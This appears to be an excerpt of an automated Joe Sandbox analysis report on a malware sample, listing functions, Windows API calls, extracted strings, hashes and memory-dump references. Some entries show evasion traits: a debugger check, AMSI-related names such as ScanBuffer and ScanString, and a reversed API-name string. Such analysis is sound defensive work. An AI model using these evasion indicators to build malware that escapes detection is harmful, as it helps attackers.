                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 269201875-0
                                                                                                                        • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                                        • Instruction ID: 96285ce173783187f184f61746e7fbd83da36e3ecfce7d0074626a3971be4b8b
                                                                                                                        • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                                        • Instruction Fuzzy Hash: C741C536A00200DFCB24DF78C880A5AB7F6EF84714F168569EA59EB351DB31ED01CB84
                                                                                                                        Function 02DF08F1 Relevance: 7.6, APIs: 5, Instructions: 116COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __dosmaperr$_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 242264518-0
                                                                                                                        • Opcode ID: 7dca9c723f0a3f3e5eee78a7163c4708e0db19878e5bf6bf14be5ff931373868
                                                                                                                        • Instruction ID: 01b89acfb6f508000e43900650b1773413e367722fca6b2b0181eb722bb4998c
                                                                                                                        • Opcode Fuzzy Hash: 7dca9c723f0a3f3e5eee78a7163c4708e0db19878e5bf6bf14be5ff931373868
                                                                                                                        • Instruction Fuzzy Hash: DB31C27280420ABFDF51AFA49C44DAE3B69EF05322F160169FE1057395EB30CD10DBA8
                                                                                                                        Function 02D3AA50 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetThreadLocale.KERNEL32(?,00000000,02D3AAE7,?,?,00000000), ref: 02D3AA68
                                                                                                                          • Part of subcall function 02D3A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02D3A7E2
                                                                                                                        • GetThreadLocale.KERNEL32(00000000,00000004,00000000,02D3AAE7,?,?,00000000), ref: 02D3AA98
                                                                                                                        • EnumCalendarInfoA.KERNEL32(Function_0000A99C,00000000,00000000,00000004), ref: 02D3AAA3
                                                                                                                        • GetThreadLocale.KERNEL32(00000000,00000003,00000000,02D3AAE7,?,?,00000000), ref: 02D3AAC1
                                                                                                                        • EnumCalendarInfoA.KERNEL32(Function_0000A9D8,00000000,00000000,00000003), ref: 02D3AACC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4102113445-0
                                                                                                                        • Opcode ID: f12e6ca062d604584128a2b94f7b88e1a750d9d7b79ffcd5e68ea27b617aa245
                                                                                                                        • Instruction ID: d1216f37158fd6bc9a4f76e68bac43785d6581d62a65e3aa25a1110fca2efc7b
                                                                                                                        • Opcode Fuzzy Hash: f12e6ca062d604584128a2b94f7b88e1a750d9d7b79ffcd5e68ea27b617aa245
                                                                                                                        • Instruction Fuzzy Hash: 2701F2B63042847FF613AB78DD11F6A735DDB83720F5105A0F441A67C0D665DE008AB8
                                                                                                                        Function 02E06D2D Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 269201875-0
                                                                                                                        • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                                        • Instruction ID: e327bddea48fff2b810474520bf52f45202f84530c51419081abda1ecefdaae4
                                                                                                                        • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                                        • Instruction Fuzzy Hash: 26F01232545300ABC670EB55F8C5D1673EEEA41718BA55819F50CD7AD0CB31FCD28AB8
                                                                                                                        Function 02E0BF12 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __dosmaperr
                                                                                                                        • String ID: H
                                                                                                                        • API String ID: 2332233096-2852464175
                                                                                                                        • Opcode ID: b64a76ded07e6414476391b57ad8ab2edcfe93df9d200e18b46d3283e817940b
                                                                                                                        • Instruction ID: 09e171a67e64edd8930d075b5198bd7d90a917e7e79f66acfe36efbbb4a5b37e
                                                                                                                        • Opcode Fuzzy Hash: b64a76ded07e6414476391b57ad8ab2edcfe93df9d200e18b46d3283e817940b
                                                                                                                        • Instruction Fuzzy Hash: 07A136319441088FCF19EFA8D891BAE7BB1EB06324F14525EE8159B3E1CB318993CB65
                                                                                                                        Function 02E049E9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free_strpbrk
                                                                                                                        • String ID: *?$.
                                                                                                                        • API String ID: 3300345361-3972193922
                                                                                                                        • Opcode ID: 5e5281a7710df1af016e28c269081ecff319cf0b763ae5275be817dad69de84b
                                                                                                                        • Instruction ID: 94b5a8ea02575379959e66d15225c60afad846f7e52e7ccae84a4090d393685a
                                                                                                                        • Opcode Fuzzy Hash: 5e5281a7710df1af016e28c269081ecff319cf0b763ae5275be817dad69de84b
                                                                                                                        • Instruction Fuzzy Hash: A451C475E4010AAFDF14CFA9C980AADB7F5EF48314F25816AD954E7380E7319A42CF54
                                                                                                                        Function 02D3AB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetThreadLocale.KERNEL32(?,00000000,02D3ACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02D3AB2F
                                                                                                                          • Part of subcall function 02D3A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02D3A7E2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Locale$InfoThread
                                                                                                                        • String ID: eeee$ggg$yyyy
                                                                                                                        • API String ID: 4232894706-1253427255
                                                                                                                        • Opcode ID: 11c507ccdf55fe4073ebe27743758109c74398c83fb94b6c7a7492ca91e288df
                                                                                                                        • Instruction ID: 50f5e9b8fd951a66d95737f850427b849df6dad1ea220644c7b385b1a864c8cd
                                                                                                                        • Opcode Fuzzy Hash: 11c507ccdf55fe4073ebe27743758109c74398c83fb94b6c7a7492ca91e288df
                                                                                                                        • Instruction Fuzzy Hash: 1F41CFB97041484BDB13EB79C8906BEB3EBEF86200F144526E4D2C7344EA79DD01CAB5
                                                                                                                        Function 02DB8CF8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 142COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 02DEAE35: __onexit.LIBCMT ref: 02DEAE3B
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 02DB8D4C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Init_thread_footer__onexit
                                                                                                                        • String ID: T=G$p[G$>G
                                                                                                                        • API String ID: 1881088180-2601783060
                                                                                                                        • Opcode ID: 8f70ea2b40fb44211d0b69bbfe51e678a1d722ca5741e51af6e8456a38407156
                                                                                                                        • Instruction ID: dd08e69424575007b4ba41027c196edd908c43791586d3fbd54d6880c53786ad
                                                                                                                        • Opcode Fuzzy Hash: 8f70ea2b40fb44211d0b69bbfe51e678a1d722ca5741e51af6e8456a38407156
                                                                                                                        • Instruction Fuzzy Hash: BC418131504640CBC626FB24D8B4AEE73AAEF85311F40452EE54B863E0DF74AD49CE69
                                                                                                                        Function 02DBDCF4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen
                                                                                                                        • String ID: XF$$$<XF
                                                                                                                        • API String ID: 176396367-2187388861
                                                                                                                        • Opcode ID: db32128b02a1ccbc70c4588b7822f6c775a314ba91b6364ff21a4127614396bf
                                                                                                                        • Instruction ID: fde29fb745098533f9f4e0d12c41cedb0dfc27e7d990a058079b00f611e065fc
                                                                                                                        • Opcode Fuzzy Hash: db32128b02a1ccbc70c4588b7822f6c775a314ba91b6364ff21a4127614396bf
                                                                                                                        • Instruction Fuzzy Hash: 7811A1B2904258EADB14FBA4D854BDEB7BDDF49710F51006AE905F3240EB789E048B79
                                                                                                                        Function 02D481CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02D4823C,?,?,00000000,?,02D47A7E,ntdll,00000000,00000000,02D47AC3,?,?,00000000), ref: 02D4820A
                                                                                                                          • Part of subcall function 02D48274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D482FC,?,?,00000000,00000000,?,02D48215,00000000,KernelBASE,00000000,00000000,02D4823C), ref: 02D482C1
                                                                                                                          • Part of subcall function 02D48274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D482C7
                                                                                                                          • Part of subcall function 02D48274: GetProcAddress.KERNEL32(?,?), ref: 02D482D9
                                                                                                                        • GetModuleHandleA.KERNELBASE(?), ref: 02D4821E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule$AddressProc
                                                                                                                        • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                                                        • API String ID: 1883125708-1952140341
                                                                                                                        • Opcode ID: c0f0fa6983baace7b61c2149d45570b93d763b0e6631acf109376ca1e4c24f43
                                                                                                                        • Instruction ID: 9170d901eb91458b37fcbcc858864444556dd3fb16972c5d0b6a3d7723ac3359
                                                                                                                        • Opcode Fuzzy Hash: c0f0fa6983baace7b61c2149d45570b93d763b0e6631acf109376ca1e4c24f43
                                                                                                                        • Instruction Fuzzy Hash: D2F06271A44744EFEB02EFA4EC51D5AB7EDE78A740B518860E800D3710DA74AE149A74
                                                                                                                        Function 02D4F6E8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(KernelBase,?,02D4FAEB,UacInitialize,02DB7380,02D5B7B8,OpenSession,02DB7380,02D5B7B8,ScanBuffer,02DB7380,02D5B7B8,ScanString,02DB7380,02D5B7B8,Initialize), ref: 02D4F6EE
                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02D4F700
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                        • String ID: IsDebuggerPresent$KernelBase
                                                                                                                        • API String ID: 1646373207-2367923768
                                                                                                                        • Opcode ID: 5ffd30a360041c528af067c0c64ae449872bfbae13f08419d0eb2b57c067c367
                                                                                                                        • Instruction ID: 487e95ade72bcf5cddc2cb9a9649ee83da65cc6b51ba95961dc6b1e062d2d704
                                                                                                                        • Opcode Fuzzy Hash: 5ffd30a360041c528af067c0c64ae449872bfbae13f08419d0eb2b57c067c367
                                                                                                                        • Instruction Fuzzy Hash: A4D012A13503902FBE0073F42CC4D1903CCC55556D7300E60B022C67A2E9AECC199068
                                                                                                                        Function 02D3C474 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,02D5D10B,00000000,02D5D11E), ref: 02D3C47A
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02D3C48B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                        • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                        • API String ID: 1646373207-3712701948
                                                                                                                        • Opcode ID: f5df201c206440cbff7498ac06776def00f90207456a373769a10bca14162dfd
                                                                                                                        • Instruction ID: 7b28557d4459771666aa13eb510591af09e324b4f5e669b400426817c2a6ab5f
                                                                                                                        • Opcode Fuzzy Hash: f5df201c206440cbff7498ac06776def00f90207456a373769a10bca14162dfd
                                                                                                                        • Instruction Fuzzy Hash: 5BD05EE0A507546AF602BBB5E8806313BD8D348360F008866E40165300E7FAAC14CF68
                                                                                                                        Function 02DFF3CA Relevance: 6.4, APIs: 4, Instructions: 370COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 269201875-0
                                                                                                                        • Opcode ID: 15f6b1feb3d3775b51f59aeb9f2b7affb26a76ec7276939fd337acb65b8e2728
                                                                                                                        • Instruction ID: 9d6461140b8e7ac1a158c94294cfc4d3c7e006038b4106bd3c7f59f76f2c50ba
                                                                                                                        • Opcode Fuzzy Hash: 15f6b1feb3d3775b51f59aeb9f2b7affb26a76ec7276939fd337acb65b8e2728
                                                                                                                        • Instruction Fuzzy Hash: C8C15C719002459FDB64DF78DC40BA9BBB9EF45314F16416ADA8897BE0E7308E41CB6C
                                                                                                                        Function 02E0029B Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __alldvrm$_strrchr
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1036877536-0
                                                                                                                        • Opcode ID: 34a4a8fdb2fbaed24085f9f51e48c21e05a0faa9b4c0d03c29d10533be22c836
                                                                                                                        • Instruction ID: f9c883659db0cbd967afeb4695ed59d8789b61336555ff3baeb941dd068af22c
                                                                                                                        • Opcode Fuzzy Hash: 34a4a8fdb2fbaed24085f9f51e48c21e05a0faa9b4c0d03c29d10533be22c836
                                                                                                                        • Instruction Fuzzy Hash: A2A167729847869FDB22CF58C8D07AEBBE5EF15318F18916DE4859B2C1D33889C2CB54
                                                                                                                        Function 02E029E0 Relevance: 6.3, APIs: 4, Instructions: 300COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b50f87e948356266a42ac280b2451f101745a062afa0556d4abdae292072cfe6
                                                                                                                        • Instruction ID: cada6a20df4e083fd0ef95abf4024e34e6bb2e4561f158344ef2198461cd48ab
                                                                                                                        • Opcode Fuzzy Hash: b50f87e948356266a42ac280b2451f101745a062afa0556d4abdae292072cfe6
